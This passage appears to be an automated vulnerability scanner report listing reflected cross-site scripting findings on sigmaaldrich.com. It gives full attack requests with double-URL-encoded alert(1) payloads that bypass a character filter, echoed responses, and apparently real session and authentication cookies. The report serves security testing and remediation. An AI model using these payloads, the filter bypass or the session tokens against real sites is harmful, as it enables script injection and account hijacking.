bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:19 GMT
Content-Length: 28991
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/General_Informationda5ff";alert(1)//88785618ad6/proteomics.Par.0001.File.tmp/proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.320. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/proteomics.Par.0001.File.tmp/proteomics.pdf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea339%2522%253balert%25281%2529%252f%252f628160786bc was submitted in the REST URL parameter 6. This input was echoed as ea339";alert(1)//628160786bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/General_Information/ea339%2522%253balert%25281%2529%252f%252f628160786bc/proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:24 GMT
Content-Length: 28963
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/General_Information/ea339";alert(1)//628160786bc/proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.321. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 991ab%2522%253balert%25281%2529%252f%252f5830c9f5f6c was submitted in the REST URL parameter 1. This input was echoed as 991ab";alert(1)//5830c9f5f6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc991ab%2522%253balert%25281%2529%252f%252f5830c9f5f6c/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:55 GMT
Content-Length: 29015
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc991ab";alert(1)//5830c9f5f6c/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.322. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e73d9%2522%253balert%25281%2529%252f%252fdda435ba345 was submitted in the REST URL parameter 2. This input was echoed as e73d9";alert(1)//dda435ba345 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibe73d9%2522%253balert%25281%2529%252f%252fdda435ba345/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:02 GMT
Content-Length: 29015
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibe73d9";alert(1)//dda435ba345/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.323. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b06d%2522%253balert%25281%2529%252f%252fa426dcb6558 was submitted in the REST URL parameter 3. This input was echoed as 3b06d";alert(1)//a426dcb6558 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs3b06d%2522%253balert%25281%2529%252f%252fa426dcb6558/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:09 GMT
Content-Length: 29015
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs3b06d";alert(1)//a426dcb6558/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.324. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 580ec%2522%253balert%25281%2529%252f%252f62f97b72205 was submitted in the REST URL parameter 4. This input was echoed as 580ec";alert(1)//62f97b72205 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma580ec%2522%253balert%25281%2529%252f%252f62f97b72205/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; 